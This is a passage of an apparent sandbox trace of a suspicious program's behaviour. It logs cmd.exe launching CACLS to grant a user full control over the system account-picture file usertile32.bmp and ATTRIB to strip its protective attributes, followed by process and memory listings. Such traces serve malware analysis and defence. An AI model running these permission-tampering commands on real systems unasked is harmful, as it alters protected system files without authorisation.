returned 0x262458* [0187.415] FreeEnvironmentStringsW (penv=0x262458) returned 1 [0187.415] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.415] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.415] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.415] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.415] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.415] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.415] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fb08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.415] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fb08, lpFilePart=0x12fb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fb04*="Desktop") returned 0x18 [0187.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 
0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.416] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.416] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.416] GetEnvironmentStringsW () returned 0x260308* [0187.417] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.417] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.417] GetConsoleOutputCP () returned 0x1b5 [0187.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.417] GetUserDefaultLCID () returned 0x409 [0187.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fc48, cchData=128 | out: lpLCData="0") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fc48, cchData=128 | out: lpLCData="0") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fc48, cchData=128 | out: lpLCData="1") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") 
returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.418] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.419] GetConsoleTitleW (in: lpConsoleTitle=0x2509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.420] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.421] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.421] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.421] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.421] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.421] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.421] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.421] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.425] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.425] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.425] _wcsicmp (_String1="FOR/?", 
_String2="ATTRIB") returned 5 [0187.425] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.425] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.425] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.425] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.427] GetConsoleTitleW (in: lpConsoleTitle=0x12f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.427] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.427] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.427] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.427] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.427] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.427] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.427] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.427] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.427] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.427] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.427] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.427] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.427] _wcsicmp (_String1="CACLS", 
_String2="CLS") returned -11 [0187.427] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.428] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.428] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.428] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.428] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.428] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.428] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.428] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.428] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.428] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.428] _wcsicmp 
(_String1="CACLS", _String2="ECHO") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.428] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.428] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.428] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.429] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.429] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.429] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.429] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.429] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.429] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.429] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.429] 
_wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.429] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.429] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.429] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.429] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.429] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.429] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.429] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.430] SetErrorMode (uMode=0x0) returned 0x0 [0187.430] SetErrorMode (uMode=0x1) returned 0x0 [0187.430] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x261e98, lpFilePart=0x12f3fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f3fc*="Desktop") returned 0x18 [0187.430] SetErrorMode (uMode=0x0) returned 0x1 [0187.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.435] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.436] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.436] GetLastError () returned 0x2 [0187.436] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.436] GetLastError () returned 0x2 [0187.436] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x262180 [0187.437] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0187.437] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.437] GetLastError () returned 0x2 [0187.437] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x262180 [0187.437] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0187.437] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.438] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.438] GetConsoleTitleW (in: lpConsoleTitle=0x12f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.438] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5c0 | out: lpAttributeList=0x12f4f8, lpSize=0x12f5c0) returned 1 [0187.438] UpdateProcThreadAttribute (in: lpAttributeList=0x12f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f4f8, lpPreviousValue=0x0) returned 1 [0187.438] GetStartupInfoW (in: lpStartupInfo=0x12f4b4 | out: lpStartupInfo=0x12f4b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.438] lstrcmpW 
(lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.439] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f554*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5a0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x12f5a0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfe8, dwThreadId=0xa08)) returned 1 [0187.441] CloseHandle (hObject=0x4c) returned 1 [0187.441] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.441] GetEnvironmentStringsW () returned 0x260308* [0187.441] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.441] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.472] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f494 | out: lpExitCode=0x12f494*=0x0) returned 1 [0187.472] CloseHandle (hObject=0x50) returned 1 [0187.472] _vsnwprintf (in: _Buffer=0x12f5dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f4a0 | out: _Buffer="00000000") returned 8 [0187.472] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.472] GetEnvironmentStringsW () returned 0x262410* [0187.472] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.472] 
SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.472] GetEnvironmentStringsW () returned 0x262410* [0187.472] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.472] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f4f8 | out: lpAttributeList=0x12f4f8) [0187.472] GetConsoleTitleW (in: lpConsoleTitle=0x12f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x25e4d8 [0187.473] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) 
returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x25e4d8 [0187.474] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0187.474] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.474] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.474] GetConsoleTitleW (in: lpConsoleTitle=0x12f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.474] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5c0 | out: lpAttributeList=0x12f4f8, lpSize=0x12f5c0) returned 1 [0187.474] UpdateProcThreadAttribute (in: lpAttributeList=0x12f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f4f8, lpPreviousValue=0x0) returned 1 [0187.474] GetStartupInfoW (in: lpStartupInfo=0x12f4b4 | out: lpStartupInfo=0x12f4b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.474] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.474] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f554*(cb=0x48, lpReserved=0x0, 
lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5a0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessInformation=0x12f5a0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x720, dwThreadId=0xd88)) returned 1 [0187.476] CloseHandle (hObject=0x50) returned 1 [0187.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.476] GetEnvironmentStringsW () returned 0x262410* [0187.476] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.476] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.509] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f494 | out: lpExitCode=0x12f494*=0x0) returned 1 [0187.509] CloseHandle (hObject=0x4c) returned 1 [0187.509] _vsnwprintf (in: _Buffer=0x12f5dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f4a0 | out: _Buffer="00000000") returned 8 [0187.509] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.509] GetEnvironmentStringsW () returned 0x262410* [0187.509] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.509] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.509] GetEnvironmentStringsW () returned 0x262410* [0187.510] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.510] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f4f8 | out: lpAttributeList=0x12f4f8) [0187.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.510] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.510] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.510] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.510] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.510] SetConsoleInputExeNameW () returned 0x1 [0187.510] GetConsoleOutputCP () returned 0x1b5 [0187.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.510] exit (_Code=0) Process: id = "395" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "394" os_parent_pid = "0x924" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27093 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27094 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27095 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27096 
